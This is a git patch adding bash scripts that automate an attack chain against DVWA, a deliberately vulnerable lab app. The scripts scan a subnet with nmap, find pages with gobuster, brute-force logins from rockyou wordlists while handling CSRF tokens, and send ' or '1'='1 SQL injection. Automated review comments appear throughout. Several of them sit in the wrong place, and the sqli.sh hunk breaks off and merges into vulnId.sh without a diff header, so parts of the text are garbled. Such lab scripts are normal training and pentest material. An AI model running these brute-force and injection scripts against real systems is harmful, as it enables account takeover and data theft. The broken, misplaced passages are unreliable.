From 449164ff4366a9a4b74070724221b8e964263756 Mon Sep 17 00:00:00 2001
From: "Samuel Huntley (huntleys)"
Date: Wed, 29 Apr 2020 23:52:43 +0100
Subject: [PATCH] Add files via upload

---
 bruteForce.sh | 71 +++++++++++++++++++++++++++++++++++++++++++++++++++
 bruteLogin.sh | 60 +++++++++++++++++++++++++++++++++++++++++++
 init.sh | 18 +++++++++++++
 scanInit.sh | 33 ++++++++++++++++++++++++
 sqli.sh | 43 +++++++++++++++++++++++++++++++
 vulnId.sh | 37 +++++++++++++++++++++++++++
 6 files changed, 262 insertions(+)
 create mode 100644 bruteForce.sh
 create mode 100644 bruteLogin.sh
 create mode 100644 init.sh
 create mode 100644 scanInit.sh
 create mode 100644 sqli.sh
 create mode 100644 vulnId.sh
diff --git a/bruteForce.sh b/bruteForce.sh
new file mode 100644
index 0000000..ef0f485
--- /dev/null
+++ b/bruteForce.sh
@@ -0,0 +1,71 @@
+#vulnId.sh --> bruteForce.sh
+
+echo -e "\n---- Starting Brute Force on brute vulnerability ----"
+sleep 3s
+
+## Variables
+LOGIN_URL=$LOGIN_URL
+BRUTE_DIR=$BRUTE_DIR
+#USER and PASS found from bruteLogin.sh
+DVWA_USER=$DVWA_USER
+DVWA_PASS=$DVWA_PASS
+
+#DVWA_USER='admin'
+#DVWA_PASS='password'
+
+USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
+PASS_LIST="/usr/share/seclists/Passwords/Leaked-Databases/rockyou-40.txt"
+
+## Value to look for in response in webpage source code
+SUCCESS="Welcome to the password protected area $DVWA_USER"
+
+## Anti CSRF token
+CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )"
+sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie
+
+## Login to DVWA using cookie
+curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null
+[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1
+
+## Counter
+i=0
+
+## Password loop
+while read -r _PASS; do
+
+## Username loop
+while read -r _USER; do
+
+## Increase counter
+((i=i+1))
+
+## Display USER:PASS attempts to user
+#echo "Try ${i}: ${_USER} : ${_PASS}"
+
+## Connect to web server
+REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "$BRUTE_DIR/?username=${_USER}&password=${_PASS}&Login=Login" )"
+[[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+## Check response against SUCCESS string
+echo "${REQUEST}" | grep -q "${SUCCESS}"
+if [[ "$?" -eq 0 ]]; then
+## Success!
+echo -e "\nFound at Try: ${i}"
+echo "Username: ${_USER}"
+echo "Password: ${_PASS}"
+
+#echo "${REQUEST}"
+echo "$SUCCESS"
+sleep 3s
+break 2
+fi
+
+done < ${USER_LIST}
+done < ${PASS_LIST}
+
+## Clean up
+#rm -f /tmp/dvwa.cookie
+
+export COUNT=2
+
+/bin/bash ~/Documents/DVWA/scripts/vulnId.sh
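Review bot: The DVWA password is placed in curl's argument list twice in this hunk — in the `-d "username=…&password=${DVWA_PASS}…"` login call and in the `?username=…&password=${_PASS}` query string inside the loop — so it is readable by any local user through `ps`, is echoed by `set -x`, and lands in shell history whenever these lines are run interactively, while the session cookie written to the fixed path `~/Documents/DVWA/scripts/dvwa.cookie` stays on disk after the script ends. For the login call, write the POST body to a `mktemp` file created under `umask 077` and pass it as `-d @"$body_file"`, and delete the cookie file from a `trap … EXIT` rather than leaving the commented `#rm -f /tmp/dvwa.cookie`, which names a different path from the one the script actually uses. The same argv pattern appears in the bruteLogin.sh and sqli.sh hunks. As a point of style, `echo "${REQUEST}" | grep -q "${SUCCESS}"` followed by `if [[ "$?" -eq 0 ]]` reads more directly as `if grep -q -- "${SUCCESS}" <<<"${REQUEST}"; then`, and the two `done < ${USER_LIST}` / `done < ${PASS_LIST}` redirections should be quoted.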
diff --git a/bruteLogin.sh b/bruteLogin.sh
new file mode 100644
index 0000000..c5f7619
--- /dev/null
+++ b/bruteLogin.sh
@@ -0,0 +1,60 @@
+#scanInit.sh --> bruteLogin.sh
+
+echo -e " \n---- Starting Brute force on Login Page ---- "
+
+## Variables
+export LOGIN_URL=$LOGIN_URL
+USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
+PASS_LIST="/usr/share/seclists/Passwords/rockyou.txt"
+export IP=$INIT_IP
+
+## Value to look for in response
+SUCCESS="Location: index.php"
+
+## Counter
+i=0
+
+## Password loop
+while read -r _PASS; do
+
+## Username loop
+while read -r _USER; do
+
+## Increase counter
+((i=i+1))
+
+## Display USER:PASS attempts to user
+## Comment out for less noise
+#echo "Try ${i}: ${_USER} : ${_PASS}"
+
+## Connect to web server
+CSRF=$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie $LOGIN_URL | awk -F 'value=' '/user_token/ {print $2}' | awk -F "'" '{print $2}' )
+
+REQUEST="$( curl -sib ~/Documents/DVWA/scripts/dvwa.cookie --data "username=${_USER}&password=${_PASS}&user_token=${CSRF}&Login=Login" $LOGIN_URL )"
+[[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+## Check response against SUCCESS string
+echo "${REQUEST}" | grep -q "${SUCCESS}"
+if [[ "$?" -eq 0 ]]; then
+## Success!
+echo -e "\nFound at Try ${i}:\nUsername:${_USER}\nPassword:${_PASS}"
+sleep 3s
+
+#export credential variables to use in next script
+export USER="$(echo "${_USER}")"
+export PASS="$(echo "${_PASS}")"
+
+break 2
+fi
+
+done < ${USER_LIST}
+done < ${PASS_LIST}
+
+## Clean up
+rm -f ~/Documents/DVWA/scripts/dvwa.cookie
+
+#Create counter for next script
+export COUNT=1
+
+#Call next script
+/bin/bash ~/Documents/DVWA/scripts/vulnId.sh
diff --git a/init.sh b/init.sh
new file mode 100644
index 0000000..095d718
--- /dev/null
+++ b/init.sh
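Review bot: `export USER="$(echo "${_USER}")"` overwrites the login shell's `USER` variable for every process this script spawns — vulnId.sh, curl and gobuster downstream — even though `USER` is the conventional variable that tools and prompts consult for the current account name, and vulnId.sh then reads it back as `$USER` to populate `DVWA_USER`. Export the namespaced names vulnId.sh already works with and drop the no-op command substitution: `export DVWA_USER="${_USER}"` and `export DVWA_PASS="${_PASS}"`, with vulnId.sh reading those directly instead of re-deriving them from `$USER` and `$PASS`. `$LOGIN_URL` is also unquoted in both curl calls in this hunk; quote it as bruteForce.sh does, and quote the two `done < ${USER_LIST}` / `done < ${PASS_LIST}` redirections.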
@@ -0,0 +1,18 @@
+##init.sh
+
+##Force no internet
+#nmcli networking off
+
+##Check for internet connection
+wget -q --spider http://google.com
+if [ $? -eq 0 ]; then
+echo "Online"
+echo -e "---- Starting Network scans ---- \n "
+/bin/bash ~/Documents/DVWA/scripts/scanInit.sh
+else
+echo "No network connection"
+echo "quitting"
+exit
+fi
+
+
diff --git a/scanInit.sh b/scanInit.sh
new file mode 100644
index 0000000..aaeab1a
--- /dev/null
+++ b/scanInit.sh
@@ -0,0 +1,33 @@
+#init.sh --> scanInit.sh
+
+##Variables
+##export local IP
+#export INIT_IP=$(ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'
+
+#Get all IP's and HTTP ports on network
+nmap -T4 -Pn 192.168.40.141/24 | grep -E 'http|([0-9]{1,3}[\.]){3}[0-9]{1,3}' | grep -v https > tmp.txt
+
+#Get HTTP ip address
+export INIT_IP=$(cat tmp.txt | grep 'http' -B 1 | grep -Eo '([0-9]{1,3}[\.]){3}[0-9]{1,3}')
+#Get HTTP port
+HTTP_PORT=$(cat tmp.txt | grep http | sed 's/[^0-9]*//g')
+
+#rm tmp.txt
+
+#HTTP_PORT=80
+
+echo "IP address: $INIT_IP"
+echo "HTTP port number: $HTTP_PORT"
+export WORD_LIST="/usr/share/dirb/wordlists/common.txt"
+
+#Create variable for the Login URL using the IP and open port number
+export LOGIN_URL=$(gobuster dir -u "$INIT_IP:$HTTP_PORT/DVWA/" -nqelw $WORD_LIST -x php | grep login | grep -o '^\S*')
+
+echo "Full Login URL: $LOGIN_URL"
+
+sleep 3s
+
+#Call next script (Brute Forcing the login page)
+/bin/bash ~/Documents/DVWA/scripts/bruteLogin.sh
+
+
diff --git a/sqli.sh b/sqli.sh
new file mode 100644
index 0000000..816767a
--- /dev/null
+++ b/sqli.sh
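Review bot: The offline branch of init.sh exits with status 0, because the bare `exit` after `echo "quitting"` returns that echo's status, so whatever launched init.sh is told the run succeeded even though no scan ran; make it `exit 1`. The `wget -q --spider http://google.com` / `if [ $? -eq 0 ]` pair also reads more directly as the single condition `if wget -q --spider http://google.com; then`. A one-line comment explaining why the script keeps a commented-out `nmcli networking off` under `##Force no internet` while requiring a reachable google.com would help the next reader, since the two read as contradictory intentions.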
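Review bot: scanInit.sh writes the nmap output to `tmp.txt` in whatever directory it is run from, the cleanup `#rm tmp.txt` is commented out, and the `rm tmp.txt` in vulnId.sh's case 3 is likewise relative to its own working directory, so the scan result is only ever removed when every script happens to run from the same directory; create it here with `scan_out=$(mktemp)` and `trap 'rm -f -- "$scan_out"' EXIT`, and read it with `grep … "$scan_out"` rather than `cat tmp.txt | grep …`. The commented `#export INIT_IP=$(ip -4 addr show eth0 | …)` line is also missing its closing `)` and would be a syntax error if re-enabled. `INIT_IP` and `HTTP_PORT` each take the entire output of their `grep`, so if the range contains more than one HTTP service both hold several newline-separated values and the `LOGIN_URL` assembled on the gobuster line is malformed; the script should abort unless exactly one host was found, rather than proceed against a host it was not pointed at.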
@@ -0,0 +1,43 @@
+#vulnId.sh --> sqli.sh
+
+#Variables
+#URL=$URL
+IP=$IP
+SQLI_DIR=$SQLI_DIR'/'
+SQLI_1=' or '1'='1
+EXT='?id=1&Submit=Submit'
+LOGIN_URL="http://192.168.40.145/DVWA/login.php/"
+DVWA_USER=$USER
+DVWA_PASS=$PASS
+
+#sqlmap -u "${SQLI_DIR}?id=&Submit=Submit" --cookie="PHPSESSID=96uqh3mj23mg50vnn2uadsj5rj;security=low" --batch --drop-set-cookie
+
+## Anti CSRF token
+CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )"
+sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie
+
+## Login to DVWA using cookie
+curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null
+[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1
+
+## Connect to server using cookie
+REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?username=${DVWA_USER}&password=${DVWA_PASS}&Login=login${EXT}" )"
+[[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+#Display Success
+echo "${REQUEST}" | grep "Vulnerability: SQL Injection" | sed -e 's/^[ \t]*//'
+
+#Attempt SQLi with DVWA'or'1'='1
+echo -e "\n---- Attempting SQLi using DVWA'or'1'='1 ----\n"
+TEST1="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?id=DVWA'or'1'='1&Submit=Submit" )"
+[[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+#Format output
+echo "${TEST1}" | grep -o -P '(?<=pre).*(?=pre)' | sed -e 's/
/\\\n/g' -e 's/\\/ /g' -e 's/[/>]//g' -e 's/ vulnId.sh
+#bruteForce.sh --> vulnId.sh
+
+##Variables
+#export URL="http://192.168.40.145/DVWA/vulnerabilities"
+WORD_LIST="/usr/share/dirb/wordlists/common.txt"
+EXT="/DVWA/vulnerabilities"
+COUNT=$COUNT
+#export COUNT=$COUNT
+export DVWA_USER=$USER
+export DVWA_PASS=$PASS
+export LOGIN_URL=$LOGIN_URL
+export IP=$IP
+
+case $COUNT in 
+	1)	
+        #dirb on DVWA home page to find brute vulnerability directory
+        echo -e "\n---- Finding brute force directory ----\n"        
+	export BRUTE_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/brute ' | grep -o '^\S*')        
+	echo -e "Directory with brute vulnerability: $BRUTE_DIR"
+        sleep 5s
+        /bin/bash ~/Documents/DVWA/scripts/bruteForce.sh
+        ;;
+        2)
+	#find sqli vulnerability directory
+        echo -e "\n---- Finding SQL injection directory ----\n"        
+	export SQLI_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/sqli ' | grep -o '^\S*')
+        echo -e "Directory with sqli vulnerability: $SQLI_DIR \n"
+        sleep 5s
+        /bin/bash ~/Documents/DVWA/scripts/sqli.sh
+        ;; 
+        3) 
+        rm tmp.txt
+	rm dvwa.cookie
+	;;
+        *)
+esac